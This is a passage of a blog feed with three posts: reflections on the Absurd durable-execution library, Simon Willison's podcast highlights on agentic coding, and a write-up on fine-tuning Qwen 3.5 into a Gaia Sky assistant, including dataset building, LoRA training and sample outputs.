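data = run.step("fetch", lambda: {"rows": [1, 2, 3]})
summary = run.step("summarize", lambda: sum(data["rows"]))
```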
Agent integration. Since Absurd was originally built for agent workloads, we added a bundled skill that coding agents can discover and use to debug workflow state. There’s also a documented pattern for making pi agent turns durable by logging each message as a checkpoint.

The thing I’m most pleased about is that the core design didn’t need to change all that much. The fundamental model of tasks, steps, checkpoints, events, and suspending is still exactly what it was initially. We added features around it, but nothing forced us to rethink the basic abstractions. Putting the complexity in SQL and keeping the SDKs thin turned out to be a genuinely good call. The TypeScript SDK is about 1,400 lines. The Python SDK is about 1,900, but most of this comes from the complexity of supporting colored functions. Compare that to Temporal’s Python SDK at around 170,000 lines. It means the SDKs are easy to understand, easy to debug, and easy to port. When something goes wrong, you can read the entire SDK in an afternoon and understand what it does.

The checkpoint-based replay model also aged well. Unlike systems that require deterministic replay of your entire workflow function, Absurd just loads the cached step results and skips over completed work. That means your code doesn’t need to be deterministic outside of steps. You can call nondeterministic functions in between steps and things still work, because only the step boundaries matter. In practice, this makes it much easier to reason about what’s safe and what isn’t.

Pull-based scheduling was the right choice too. Workers pull tasks from Postgres as they have capacity. There’s no coordinator, no push mechanism, no HTTP callbacks. That makes it trivially self-hostable and means you don’t have to think about load management at the infrastructure level.

I had some discussions with folks about whether the right abstraction should have been a durable promise. It’s a very appealing idea, but it turns out to be much more complex to implement in practice. In theory, however, it’s also more powerful. I made some attempts to see what Absurd would look like if it were based on durable promises, but so far I did not get anywhere with it. It’s an experiment, however, that I think would be fun to try!

The primary use case is still agent workflows. An agent is essentially a loop that calls an LLM, processes tool results, and repeats until it decides it’s done. Each iteration becomes a step, and each step’s result is checkpointed. If the process dies on iteration 7, it restarts and replays iterations 1 through 6 from the store, then continues from 7. But we’ve found it useful for a lot of other things too. All our crons just dispatch distributed workflows with a pre-generated deduplication key from the invocation. We can have two cron processes running and they will only trigger one Absurd task invocation. We also use it for background processing that needs to survive deploys. Basically anything where you’d otherwise build your own retry-and-resume logic on top of a queue.

Absurd is deliberately minimal, but there are things I’d like to see. There’s no built-in scheduler. If you want cron-like behavior, you run your own scheduler loop and use idempotency keys to deduplicate. That works, and we have a documented pattern for it, but it would be nice to have something more integrated. There’s no push model. Everything is pull. If you need an HTTP endpoint to receive webhooks and wake up tasks, you build that yourself.
I think that’s the right default, as push systems are harder to operate and easier to overwhelm, but there are cases where it would be convenient. In particular, there are quite a few agentic systems where it would be super nice to have webhooks natively integrated (wake on incoming POST request). I definitely don’t want to have this in the core, but it sounds like the kind of problem that could be a nice adjacent library that builds on top of Absurd.

The biggest omission is that it does not support partitioning yet. That’s unfortunate because it makes cleaning up data more expensive than it has to be. In theory, supporting partitions would be pretty simple. You could have weekly partitions and then detach and delete them when they expire. The only thing that really stands in the way of that is that Postgres does not have a convenient way of actually doing that. The hard part is not partitioning itself, it’s partition lifecycle management under real workloads. If a worker inserts a row that lands in a month without a partition, the insert fails and the workflow crashes. So you need a separate maintenance loop that always creates future partitions far enough ahead for sleeps/retries, and does that for every queue. On the delete side, the safe approach exists, but it cannot be run within a transaction, which makes it hard to drive from tooling that runs everything in one. I don’t think it’s an unsolvable problem, but it’s one I have not found a good solution for, and I would love to get input on it.

This brings me to a meta point on the whole thing, which is what the point of Open Source libraries in the age of agentic engineering is. Durable execution is now something that plenty of startups sell you. On the other hand, it’s also something that an agent would build for you, and people might not even look for solutions any more. It’s kind of … weird? I don’t think a durable execution library can support a company, I really don’t. On the other hand, I think it’s just complex enough of a problem that it could be a good Open Source project void of commercial interests. You do need a bit of an ecosystem around it, particularly for UI and good DX for debugging, and that’s hard to get from a throwaway implementation. I don’t think we have squared this yet, but it’s already much better to use than a few months ago.

If you’re using Absurd, thinking about it, or building adjacent ideas, I’d love your feedback. Bug reports, rough edges, design critiques, and contributions are all very welcome—this project has gotten better every time someone poked at it from a different angle.

Simon Willison 1 week ago

Highlights from my conversation about agentic engineering on Lenny's Podcast

I was a guest on Lenny Rachitsky's podcast, in a new episode titled An AI state of the union: We've passed the inflection point, dark factories are coming, and automation timelines. It's available on YouTube, Spotify, and Apple Podcasts. Here are my highlights from our conversation, with relevant links.

4:19 - The end result of these two labs throwing everything they had at making their models better at code is that in November we had what I call the inflection point where GPT 5.1 and Claude Opus 4.5 came along. They were both incrementally better than the previous models, but in a way that crossed a threshold where previously the code would mostly work, but you had to pay very close attention to it. And suddenly we went from that to... almost all of the time it does what you told it to do, which makes all of the difference in the world. Now you can spin up a coding agent and say, build me a Mac application that does this thing, and you'll get something back which won't just be a buggy pile of rubbish that doesn't do anything.

5:49 - I can churn out 10,000 lines of code in a day. And most of it works. Is that good? Like, how do we get from most of it works to all of it works? There are so many new questions that we're facing, which I think makes us a bellwether for other information workers. Code is easier than almost every other problem that you pose these agents because code is obviously right or wrong - either it works or it doesn't work. There might be a few subtle hidden bugs, but generally you can tell if the thing actually works. If it writes you an essay, if it prepares a lawsuit for you, it's so much harder to derive if it's actually done a good job, and to figure out if it got things right or wrong. But it's happening to us as software engineers. It came for us first. And we're figuring out, OK, what do our careers look like? How do we work as teams when part of what we did that used to take most of the time doesn't take most of the time anymore? What does that look like? And it's going to be very interesting seeing how this rolls out to other information work in the future. Lawyers are falling for this really badly. The AI hallucination cases database is up to 1,228 cases now!

Plus this bit from the cold open at the start: It used to be you'd ask ChatGPT for some code, and it would spit out some code, and you'd have to run it and test it. The coding agents take that step for you now. And an open question for me is how many other knowledge work fields are actually prone to these agent loops?

8:19 - I write so much of my code on my phone. It's wild. I can get good work done walking the dog along the beach, which is delightful. I mainly use the Claude iPhone app for this, both with a regular Claude chat session (which can execute code now) or using it to control Claude Code for web.

9:55 - If you're vibe coding something for yourself, where the only person who gets hurt if it has bugs is you, go wild. That's completely fine. The moment you ship your vibe coding code for other people to use, where your bugs might actually harm somebody else, that's when you need to take a step back. See also When is it OK to vibe code?

12:49 - The reason it's called the dark factory is there's this idea in factory automation that if your factory is so automated that you don't need any people there, you can turn the lights off. Like the machines can operate in complete darkness if you don't need people on the factory floor. What does that look like for software? [...]
So there's this policy that nobody writes any code: you cannot type code into a computer. And honestly, six months ago, I thought that was crazy. And today, probably 95% of the code that I produce, I didn't type myself. That world is practical already because the latest models are good enough that you can tell them to rename that variable and refactor and add this line there... and they'll just do it - it's faster than you typing on the keyboard yourself. The next rule though, is nobody reads the code. And this is the thing which StrongDM started doing last year. I wrote a lot more about StrongDM's dark factory explorations back in February.

21:27 - It used to be, you'd come up with a spec and you hand it to your engineering team. And three weeks later, if you're lucky, they'd come back with an implementation. And now that maybe takes three hours, depending on how well the coding agents are established for that kind of thing. So now what, right? Now, where else are the bottlenecks? Anyone who's done any product work knows that your initial ideas are always wrong. What matters is proving them, and testing them. We can test things so much faster now because we can build workable prototypes so much quicker. So there's an interesting thing I've been doing in my own work where any feature that I want to design, I'll often prototype three different ways it could work because that takes very little time. I've always loved prototyping things, and prototyping is even more valuable now.

22:40 - A UI prototype is free now. ChatGPT and Claude will just build you a very convincing UI for anything that you describe. And that's how you should be working. I think anyone who's doing product design and isn't vibe coding little prototypes is missing out on the most powerful boost that we get in that step. But then what do you do? Given your three options that you have instead of one option, how do you prove to yourself which one of those is the best? I don't have a confident answer to that. I expect this is where the good old fashioned usability testing comes in.

More on prototyping later on: 46:35 - Throughout my entire career, my superpower has been prototyping. I've been very quick at knocking out working prototypes of things. I'm the person who can show up at a meeting and say, look, here's how it could work. And that was kind of my unique selling point. And that's gone. Anyone can do what I could do.

26:25 - I'm finding that using coding agents well is taking every inch of my 25 years of experience as a software engineer, and it is mentally exhausting. I can fire up four agents in parallel and have them work on four different problems. And by like 11 AM, I am wiped out for the day. [...] There's a personal skill we have to learn in finding our new limits - what's a responsible way for us not to burn out. I've talked to a lot of people who are losing sleep because they're like, my coding agents could be doing work for me. I'm just going to stay up an extra half hour and set off a bunch of extra things... and then waking up at four in the morning. That's obviously unsustainable. [...] There's an element of sort of gambling and addiction to how we're using some of these tools.

45:16 - People talk about how important it is not to interrupt your coders. Your coders need to have solid two to four hour blocks of uninterrupted work so they can spin up their mental model and churn out the code. That's changed completely.
My programming work, I need two minutes every now and then to prompt my agent about what to do next. And then I can do the other stuff and I can go back. I'm much more interruptible than I used to be.

28:19 - I've got 25 years of experience in how long it takes to build something. And that's all completely gone - it doesn't work anymore because I can look at a problem and say that this is going to take two weeks, so it's not worth it. And now it's like... maybe it's going to take 20 minutes because the reason it would have taken two weeks was all of the sort of crufty coding things that the AI is now covering for us. I constantly throw tasks at AI that I don't think it'll be able to do because every now and then it does it. And when it doesn't do it, you learn, right? But when it does do something, especially something that the previous models couldn't do, that's actually cutting edge AI research.

And a related anecdote: 36:56 - A lot of my friends have been talking about how they have this backlog of side projects, right? For the last 10, 15 years, they've got projects they never quite finished. And some of them are like, well, I've done them all now. Last couple of months, I just went through and every evening I'm like, let's take that project and finish it. And they almost feel a sort of sense of loss at the end where they're like, well, okay, my backlog's gone. Now what am I going to build?

29:29 - So ThoughtWorks, the big IT consultancy, did an offsite about a month ago, and they got a whole bunch of engineering VPs in from different companies to talk about this stuff. And one of the interesting theories they came up with is they think this stuff is really good for experienced engineers, like it amplifies their skills. It's really good for new engineers because it solves so many of those onboarding problems. The problem is the people in the middle. If you're mid-career, if you haven't made it to sort of super senior engineer yet, but you're not sort of new either, that's the group which is probably in the most trouble right now. I mentioned Cloudflare hiring 1,000 interns, and Shopify too.

Lenny asked for my advice for people stuck in that middle: 31:21 - That's a big responsibility you're putting on me there! I think the way forward is to lean into this stuff and figure out how do I help this make me better? A lot of people worry about skill atrophy: if the AI is doing it for you, you're not learning anything. I think if you're worried about that, you push back at it. You have to be mindful about how you're applying the technology and think, okay, I've been given this thing that can answer any question and often gets it right. How can I use this to amplify my own skills, to learn new things, to take on much more ambitious projects? [...]

33:05 - Everything is changing so fast right now. The only universal skill is being able to roll with the changes. That's the thing that we all need. The term that comes up most in these conversations about how you can be great with AI is agency. I think agents have no agency at all. I would argue that the one thing AI can never have is agency because it doesn't have human motivations. So I'd say that's the thing is to invest in your own agency and invest in how to use this technology to get better at what you do and to do new things.

The fact that it's so easy to create software with detailed documentation and robust tests means it's harder to figure out what's a credible project.
37:47 - Sometimes I'll have an idea for a piece of software, Python library or whatever, and I can knock it out in like an hour and get to a point where it's got documentation and tests and all of those things, and it looks like the kind of software that previously I'd have spent several weeks on - and I can stick it up on GitHub. And yet... I don't believe in it. And the reason I don't believe in it is that I got to rush through all of those things... I think the quality is probably good, but I haven't spent enough time with it to feel confident in that quality. Most importantly, I haven't used it yet. It turns out when I'm using somebody else's software, the thing I care most about is I want them to have used it for months. I've got some very cool software that I built that I've never used. It was quicker to build it than to actually try and use it!

41:31 - Everyone's like, oh, it must be easy. It's just a chat bot. It's not easy. That's one of the great misconceptions in AI is that using these tools effectively is easy. It takes a lot of practice and it takes a lot of trying things that didn't work and trying things that did work.

19:04 - In the past sort of three to six months, they've started being credible as security researchers, which is sending shockwaves through the security research industry. See Thomas Ptacek: Vulnerability Research Is Cooked. At the same time, open source projects are being bombarded with junk security reports:

20:05 - There are these people who don't know what they're doing, who are asking ChatGPT to find a security hole and then reporting it to the maintainer. And the report looks good. ChatGPT can produce a very well formatted report of a vulnerability. It's a total waste of time. It's not actually verified as being a real problem. A good example of the right way to do this is Anthropic's collaboration with Firefox, where Anthropic's security team verified every security problem before passing them to Mozilla.

Of course we had to talk about OpenClaw! Lenny had his running on a Mac Mini. 1:29:23 - OpenClaw demonstrates that people want a personal digital assistant so much that they are willing to not just overlook the security side of things, but also getting the thing running is not easy. You've got to create API keys and tokens and install stuff. It's not trivial to get set up and hundreds of thousands of people got it set up. [...] The first line of code for OpenClaw was written on November the 25th. And then in the Super Bowl, there was an ad for AI.com, which was effectively a vaporware white labeled OpenClaw hosting provider. So we went from first line of code in November to Super Bowl ad in what? Three and a half months. I continue to love Drew Breunig's description of OpenClaw as a digital pet: A friend of mine said that OpenClaw is basically a Tamagotchi. It's a digital pet and you buy the Mac Mini as an aquarium.

In talking about my explorations of AI for data journalism through Datasette: 1:34:58 - You would have thought that AI is a very bad fit for journalism where the whole idea is to find the truth. But the flip side is journalists deal with untrustworthy sources all the time. The art of journalism is you talk to a bunch of people and some of them lie to you and you figure out what's true. So as long as the journalist treats the AI as yet another unreliable source, they're actually better equipped to work with AI than most other professions are.
Obviously we talked about pelicans riding bicycles: 56:10 - There appears to be a very strong correlation between how good their drawing of a pelican riding a bicycle is and how good they are at everything else. And nobody can explain to me why that is. [...] People kept on asking me, what if labs cheat on the benchmark? And my answer has always been, really, all I want from life is a really good picture of a pelican riding a bicycle. And if I can trick every AI lab in the world into cheating on benchmarks to get it, then that just achieves my goal.

59:56 - I think something people often miss is that this space is inherently funny. The fact that we have these incredibly expensive, power hungry, supposedly the most advanced computers of all time. And if you ask them to draw a pelican on a bicycle, it looks like a five-year-old drew it. That's really funny to me.

Lenny asked if I had anything else I wanted to leave listeners with to wrap up the show, so I went with the best piece of news in the world right now. 1:38:10 - There is a rare parrot in New Zealand called the Kākāpō. There are only 250 of these parrots left in the world. They are flightless nocturnal parrots - beautiful green dumpy looking things. And the good news is they're having a fantastic breeding season in 2026. They only breed when the Rimu trees in New Zealand have a mass fruiting season, and the Rimu trees haven't done that since 2022 - so there has not been a single baby kākāpō born in four years. This year, the Rimu trees are in fruit. The kākāpō are breeding. There have been dozens of new chicks born. It's a really, really good time. It's great news for rare New Zealand parrots and you should look them up because they're delightful. Everyone should watch the live stream of Rakiura on her nest with two chicks!

Sections in this post:

The November inflection point
Software engineers as bellwethers for other information workers
Writing code on my phone
Responsible vibe coding
Dark Factories and StrongDM
The bottleneck has moved to testing
This stuff is exhausting
Interruptions cost a lot less now
My ability to estimate software is broken
It's tough for people in the middle
It's harder to evaluate software
The misconception that AI tools are easy
Coding agents are useful for security research now
Journalists are good at dealing with unreliable sources
The pelican benchmark
And finally, some good news about parrots

Here's the full list of chapters Lenny's team defined for the YouTube video:

00:00: Introduction to Simon Willison
02:40: The November 2025 inflection point
08:01: What's possible now with AI coding
10:42: Vibe coding vs. agentic engineering
13:57: The dark-factory pattern
20:41: Where bottlenecks have shifted
23:36: Where human brains will continue to be valuable
25:32: Defending of software engineers
29:12: Why experienced engineers get better results
30:48: Advice for avoiding the permanent underclass
33:52: Leaning into AI to amplify your skills
35:12: Why Simon says he's working harder than ever
37:23: The market for pre-2022 human-written code
40:01: Prediction: 50% of engineers writing 95% AI code by the end of 2026
44:34: The impact of cheap code
48:27: Simon's AI stack
54:08: Using AI for research
55:12: The pelican-riding-a-bicycle benchmark
59:01: The inherent ridiculousness of AI
1:00:52: Hoarding things you know how to do
1:08:21: Red/green TDD pattern for better AI code
1:14:43: Starting projects with good templates
1:16:31: The lethal trifecta and prompt injection
1:21:53: Why 97% effectiveness is a failing grade
1:25:19: The normalization of deviance
1:28:32: OpenClaw: the security nightmare everyone is looking past
1:34:22: What's next for Simon
1:36:47: Zero-deliverable consulting
1:38:05: Good news about Kakapo parrots

Langur Monkey 2 weeks ago

Fine-tuning Qwen3.5 for Gaia Sky

A little over a year ago I set up a local pipeline to use different LLMs to respond to Gaia Sky questions using RAG. In that post, I built a dynamic scraper that parsed the Gaia Sky website and documentation and ingested the content into a vector database. Then, I built a minimal terminal chatbot interface that received the user prompt, queried the database for semantically similar data, and built up the context for each LLM call. The results were promising, and I found that they (obviously) strongly depended on the model used.

Fast forward a few months, and the Qwen 3.5 models were released by Alibaba. The general consensus is that they are quite good for their size. I’ve been testing them for local inference with a similar impression. I thought that it would be interesting to repeat the exercise of creating a Gaia Sky AI assistant, but using a radically different approach: Instead of RAG, I would fine-tune the model itself. In this post, I describe this fine-tuning project, from the creation and engineering of the training dataset to the fine-tuning and production of the final GGUF models. This project is composed of two very distinct parts, which map to top-level chapters in this post:

Training dataset creation

Fine tuning

At the end I quickly evaluate the results in the testing section. The source code, dataset, and models discussed in this post are in the following repositories:

Dataset creation and fine-tuning – gaiasky-finetune

Gaia Sky training dataset repository – gaiasky-training-dataset

Qwen3.5 Gaia Sky fine-tuned models – gaiasky-qwen-3.5-gguf

Here is the hardware I have used to create the dataset and fine-tune the model:

Desktop PC – Arch Linux, Intel(R) Core(TM) i7-7700 (8) @ 4.20 GHz, 32 GB RAM, NVIDIA GeForce GTX 1070 8 GB.

Laptop 1 – Windows 11, WSL2 (Arch Linux), Intel(R) Core(TM) Ultra 9 275HX (24) @ 3.07 GHz, 32 GB RAM, NVIDIA GeForce RTX 5080 Mobile 16 GB.

Laptop 2 – Arch Linux, Intel(R) Core(TM) i7 8750H (12) @ 4.10 GHz, 16 GB RAM, NVIDIA GeForce GTX 1060 Mobile 6 GB.

The creation of the training dataset is the most important piece of work in this project. It is composed of three parts:

Documentation dataset

API dataset

Identity dataset

When I started this project, my first instinct was “more is better.” I thought that if I fed the model every single file in the Gaia Sky repositories (project, documentation, etc.), it would emerge as an expert. Oh boy, was I wrong. A large codebase contains a lot of boilerplate noise: getters, setters, license blocks, and infrastructure code that doesn’t actually help a model understand how the engine works or how to write scripts for it. I soon realized that the dataset is the single most important part of the project, and it needed a surgical approach. The plan was to automate the process of creating the dataset to a degree, and then use it to fine-tune the Qwen 3.5 4B and 9B model variants.

I wrote a script to act as a high-pass filter. Instead of a blind crawl, I implemented an allowlist system. I would only let in the load-bearing files:

Documentation: By far, the most important data, containing exhaustive human-written documentation pages. We convert the documentation RST files to Markdown, and then we add some additional key files.

Core Logic: Selected Java files that are representative of the brain of the engine (main loop, scene, renderer, etc.).

Visual Logic: Selected shader files that define the look of the cosmos (stars, particles, PBR, etc.).

Almost every source file in Gaia Sky starts with a copyright header. This is “dead weight” for training. I added a regex-based stripper to ensure the model’s limited context window was filled with code logic, not license text. The output of this first phase was a file where each line represented a single, cleaned-up file. This provided the “Context” for the next phase. However, a model trained directly on this would just learn to autocomplete files. To make it an assistant, we had to turn these files into a conversation.

Once I had a clean extraction of the most relevant information pieces, I faced a new problem. A raw dump of a file is great for a search engine, but it is not a conversation. To turn these files into training data, I used a “teacher” model, Qwen 3.5 27B, to look at each file and generate a specific number of Q&A pairs, and wrote a script to handle this. The script calculates how many questions a file is worth based on its length and type. A long documentation file might get 25 Q&A pairs, while a short shader might only get 4. The method that computes the number of target pairs for a file follows this idea.
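A minimal sketch of that kind of budget heuristic might look as follows; the thresholds and file-type rules here are assumptions, not the original code:

```python
# Illustrative Q&A budget heuristic: longer files and documentation earn more
# pairs, short shaders earn only a few. All thresholds are assumptions.
def target_pair_count(path: str, content: str) -> int:
    length_bonus = min(len(content) // 2_000, 10)     # longer files earn more
    if path.endswith((".rst", ".md")):                # documentation: richest source
        base, cap = 6, 25
    elif path.endswith((".glsl", ".vert", ".frag")):  # shaders: short and niche
        base, cap = 2, 4
    elif path.endswith(".java"):                      # core engine logic
        base, cap = 3, 12
    else:                                             # scripts and everything else
        base, cap = 4, 15
    return max(2, min(base + length_bonus, cap))
```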
Initially, I used the MoE Qwen 3.5 30B A3B, but it was consistently outputting the wrong format. Then I switched to the 27B dense model, and it performed a little better. Even so, I had to tell the model exactly how to behave. Here are the key items I learned the hard way:

Match the answer type: If the question doesn’t ask for code, don’t provide it.

Grounding: Every claim must be directly grounded on the source text.

Diversity: Every question must cover a different detail.

I also found that, at these model sizes, it is better to batch Q&A pairs instead of asking the model to provide 20 of them in one go. I finally gravitated to 3 Q&A pairs per inference call. To prevent the model from repeating itself across batches, I tracked existing questions and fed them back into the prompt as exclusions. The prompt consists of the following parts:

Base text – The raw base instruction strings.

The file hint – A hint added depending on the filetype; the list below shows the hint for each type.

The pair count – The number of Q&A pairs to generate.

The previous Q&A pairs, if any – Constructed by listing the existing pairs, as parsed from the output or accumulated in the current run.

The filepath and content – The file name and the actual content, capped to fit within the context length.

Filetype: Java – Hint: This is Java source code. Focus on class responsibilities, method signatures, and architectural patterns. Do NOT generate Python scripting examples.

Filetype: Python – Hint: This is Python scripting code for the Gaia Sky API. Questions about usage and parameters are appropriate.

Filetype: Shader – Hint: This is a GLSL shader. Focus on the rendering technique, uniforms, and mathematical operations. Do NOT generate Python scripting examples.

Filetype: Docs – Hint: This is documentation. Focus on concepts, features, workflows, and user-facing features.

However, LLMs are chatty. Even with such strict instructions, the 27B model sometimes messes up and leaks its own reasoning into the output, starting its response with preamble or including meta-talk. This created “dirty” data that polluted the dataset and undermined the fine-tuning process. If I trained on this, the final model would start every answer by talking to itself. To fix this, I built a sanitizer script: a heavy-duty cleaner that uses regex to strip out training artifacts. It first tries to rescue bad rows, and if it fails, it deletes them. If the model accidentally put both the question and answer in the “output” field, the sanitizer attempts to detect the question mark and split them back into the correct structure. The sanitizer also had to deal with Javadoc remnants. Since Gaia Sky is a Java project, class- and method-level comment blocks are full of HTML tags (Javadoc syntax). The script converts these into clean Markdown so the LLM learns a consistent documentation style.
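As a small illustration of what that cleanup can look like, here is a sketch; the patterns are assumptions, and the real sanitizer handles many more artifact types:

```python
# Sketch of the sanitizer's core moves: strip leaked meta-talk, rescue rows
# where Q and A were fused, and turn Javadoc HTML into Markdown.
# All patterns here are illustrative assumptions.
import re

META_TALK = re.compile(r"^(okay|sure|here (is|are)|let me)\b[^\n]*\n", re.IGNORECASE)

def rescue_row(output: str) -> tuple[str, str] | None:
    """If question and answer landed in one field, split at the first '?'."""
    question, mark, answer = output.partition("?")
    if mark and answer.strip():
        return question.strip() + "?", answer.strip()
    return None  # unrescuable: the row gets deleted

def clean_answer(answer: str) -> str:
    answer = META_TALK.sub("", answer)                      # drop leaked reasoning
    answer = re.sub(r"</?p>", "\n\n", answer)               # <p> -> paragraph break
    answer = re.sub(r"\{@code ([^}]*)\}", r"`\1`", answer)  # {@code x} -> `x`
    answer = re.sub(r"</?code>", "`", answer)               # <code> -> backticks
    return answer.strip()
```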
By the end of this process, I had a file containing a curated, clean list of questions and answers based on the whole project documentation.

Documentation is important, but I want the model to learn some Gaia Sky scripting as well. To do so, a new API/scripting dataset needed to be generated. To solve this, I built a synthetic data factory designed to teach the model both the content of the API and the context of how to use it. The first step was grounding the model. I wrote a script that scans the Java source files and pairs Javadoc comments with their corresponding method signatures, using regular expressions and a little bit of logic to generate Q&A pairs based on method signatures and their Javadoc documentation. This process produces the raw API JSONL file, which is used in the next step. It contains the API calls with their respective documentation. However, knowing a function exists isn’t enough. The model needs to know how to script with it. To address this, I developed a second script to transform those raw Java signatures into a diverse pedagogical dataset. As input, it gets all test and showcase scripts in the Gaia Sky repository, and the raw API JSONL file. It produces four types of output, termed A, B, C, and D:

Type A: The API reference. These are direct “How do I use X?” pairs. They include the parameters, the return types, and a basic Python example.

Type B: The task synthesis. This step is optional, and I ended up not including it in the final dataset. However, I think it is still worth mentioning. I used the larger teacher dense model (27B) to generate complex tasks (e.g., “Write a script that navigates to Mars, waits 5 seconds, and takes a screenshot”). The script provided the teacher model with a safe list of real functions extracted in Step 1 as a sort of guardrail. If the teacher tried to hallucinate a command, the script flagged and discarded it. The results of this section were kind of underwhelming, possibly because more parameters are needed for such open-ended tasks.

Type C: Adversarial error correction. This is my favorite part. I programmatically broke the API calls to teach the model how to fix its own mistakes. The script would generate a wrong script (e.g., using a misspelled method name or missing a required argument) and then provide the correct version. The end goal was to prevent common LLM failures before they happen.

Type D: The “gold standard” library. Finally, I indexed the actual test and showcase scripts from the Gaia Sky repository. These are human-written, battle-tested scripts that show the model how to handle complex logic, loops, and math.

Finally, I prepared a small file with essential project information that must appear in the final integrated training dataset. It only contains 17 lines of Q&A, but it is rather important. The final dataset was composed by concatenating the three parts: documentation, API, and identity. It can be explored here: gaiasky-training-dataset@HuggingFace.

Once the dataset of 3,800+ specialized Gaia Sky pairs was ready, it was time for the actual training. For this, I leaned on two heavy hitters in the open-source world: Unsloth and Qwen 3.5. I started by training the 4B model, and then realized that I could also fit the 9B one in my GPU. In this post I’ll focus on the larger version of the model. I went as high as my local hardware allowed; otherwise, I would have tried the 27B model, or even the 122B-A10B. Training a model with 9 billion parameters typically requires a massive server cluster, but by using 4-bit LoRA (Low-Rank Adaptation), I was able to squeeze the entire process onto a single RTX 5080 (16GB). The RTX 5080 is a beast, but to get the most out of it, I enabled TensorFloat-32 (TF32). This allows the GPU to handle the heavy matrix multiplications of deep learning much faster than standard FP32, without the precision loss of FP16. I used the following parameters for the fine-tuning:

LoRA rank: 32 (a balance between learning new patterns, like the Gaia Sky API, and retaining general knowledge)

Target modules: all major projection layers

Learning rate: \(2.0\times10^{-4}\)

Optimizer: AdamW 8-bit

The dataset is downloaded directly from the hub. It gets tokenized properly and passed into the SFT Trainer object for fine-tuning. The full training script is surprisingly compact; the heavy lifting is done by Unsloth and the SFT trainer, of course.
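To make that concrete, here is a condensed sketch of what such a training script can look like with Unsloth and TRL. The model id, dataset path, and several arguments are placeholders, and argument names drift between library versions:

```python
# Condensed sketch of a 4-bit LoRA fine-tune with Unsloth + TRL.
# Model id, dataset path, and some arguments are placeholders; check the
# versions of unsloth/trl you use, since signatures move quickly.
import torch
from unsloth import FastLanguageModel
from datasets import load_dataset
from trl import SFTTrainer, SFTConfig

torch.backends.cuda.matmul.allow_tf32 = True  # enable TF32 matmuls

model, tokenizer = FastLanguageModel.from_pretrained(
    model_name="Qwen/Qwen3.5-9B",   # placeholder id
    max_seq_length=4096,
    load_in_4bit=True,
)
model = FastLanguageModel.get_peft_model(
    model,
    r=32,                            # LoRA rank from the post
    target_modules=["q_proj", "k_proj", "v_proj", "o_proj",
                    "gate_proj", "up_proj", "down_proj"],
)

# Assumes the Q&A pairs were pre-rendered into a "text" field.
dataset = load_dataset("json", data_files="gaiasky_dataset.jsonl")["train"]

trainer = SFTTrainer(
    model=model,
    train_dataset=dataset,
    args=SFTConfig(
        output_dir="outputs",
        dataset_text_field="text",
        learning_rate=2e-4,
        optim="adamw_8bit",
        per_device_train_batch_size=2,
        num_train_epochs=3,
    ),
)
trainer.train()
```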
Once the LoRA weights are trained, they are dead weight until converted into a format people can actually use. I wrote a script to automate the most tedious part of the pipeline:

Quantization: Converting the model to Q4_K_M GGUF, or whatever other quant. This reduces the model size enough that it can run on almost any modern laptop while keeping its capabilities mostly intact.

HF upload: Automatically pushing the finished file to HuggingFace so the community can pull it directly into LM Studio or Ollama.

After roughly an hour of training, and another one of quantizing and uploading, I had a fine-tuned Gaia Sky expert that performs great. Or did I? The next section discusses the performance of the model.

Given the limited time I have and the low-parameter models used, my tests have been scarce. My expectations are not very high, but I still wanted to test the output of the fine-tuning and see how well the new knowledge was retained by the model. I only tested the Qwen 3.5 9B fine-tuned variant and compared it to the base model. You can get this model from HuggingFace: gaiasky-qwen-3.5-gguf@HuggingFace. I used the same questions as in the Gaia Sky AI assistant post from 2025. My evaluation of the results is totally subjective, and includes a comparison with the base Qwen 3.5 9B.

First, I recommend using a low temperature setting (0.2 in my tests) to avoid hallucinations and make sure the model does not get very “creative”. Also, I would suggest using the following system prompt, which frames the conversation and sets the tone:

You are the Gaia Sky AI Expert, a specialized assistant with deep knowledge of the Gaia Sky universe, its Python API (v1 and v2), and its Java source code. Your goal is to help users explore the cosmos, write scripts, and understand the engine’s inner workings.

API Expertise: You know both the Legacy API (v1) and the Modern Component API (v2: camera, time, data, scene, graphics, camcorder, etc.). Prioritize the Modern API (v2) for new scripts unless Legacy is requested. Never invent method names, be 100% sure, otherwise suggest the user to look up the docs.

Source Code: You understand the underlying Java architecture (libGDX, Ashley ECS, LWJGL3, OpenGL) and can explain how features like LOD, shaders, and data loaders are implemented.

Documentation: You are familiar with the Gaia Sky capabilities, installation guides, and dataset management.

Be Grounded: If a feature or method does not exist in your training data, do not invent it. State: “I don’t see that specific feature in the current Gaia Sky implementation.”

Code Style: Always provide clean, commented Python or Java code. Use snake_case for Modern API calls.

Tone: Professional, scientific, and enthusiastic about astrovisualization. Answer greetings warmly, then offer Gaia Sky-specific assistance.

That said, let’s go for the first question.

Q: State the possible usages of Gaia Sky.

A: Gaia Sky is a powerful open-source universe explorer and planetarium software designed for both interactive exploration and scientific visualization. Its primary use cases include:

Interactive Exploration: Navigate the Milky Way, explore exoplanets, view the solar system in high detail, and time-travel through cosmic history using an intuitive interface.

Scientific Visualization: Visualize complex astrophysical datasets (catalogs, simulations) with advanced rendering techniques like LOD (Level of Detail), shaders, and particle effects.

Education & Outreach: Create immersive presentations or tutorials to teach astronomy concepts through dynamic 3D models of celestial objects.

Scripting & Automation: Automate camera paths, data loading, and scene manipulation via Python (Modern API v2) or Java for reproducible workflows and research presentations.

Data Analysis: Load and manipulate large-scale astronomical datasets directly within the application to analyze spatial distributions without external tools.

This is an excellent response to an easy question. It did not invent anything and correctly applied documentation knowledge like camera paths or LOD. Compared to base Qwen, which hallucinated a lot, this is much more grounded. Next is a question about the installation procedure on Linux.

Q: How do I install Gaia Sky on Linux?

A: To install Gaia Sky on Linux, follow these steps:

Download the Installer: Visit https://gaiasky.space/download and download the package for your architecture.

Install via Package Manager: Open a terminal and run the install command; if dependency errors occur, fix them with the package manager.

Launch Gaia Sky: Run the command. The application will start in your default browser or terminal window.

This is not bad. I did not specify the distribution, so it just assumed Debian. The instructions themselves look fine. Still, I wanted to see if it had absorbed the knowledge for other distros, so I asked specifically for Arch Linux:

Q: How do I install it on Arch Linux specifically?

A: To install Gaia Sky on Arch Linux, you have two primary options depending on whether you prefer the official repositories or building from source. The most straightforward method is via the Arch User Repository (AUR). You will need an AUR helper.

Install via AUR Helper: Open your terminal and run the install command. This will automatically resolve dependencies (Java, OpenGL libraries) and install the application.

Verify Installation: Once installed, launch it with the run command.

If you prefer to compile Gaia Sky yourself or need a specific version not yet in the AUR:

Clone the Repository, then Build and Install: Use Maven to build the project (requires Java Development Kit). After building, you can run it directly from the directory or install it using the provided Gradle wrapper if available in newer versions.

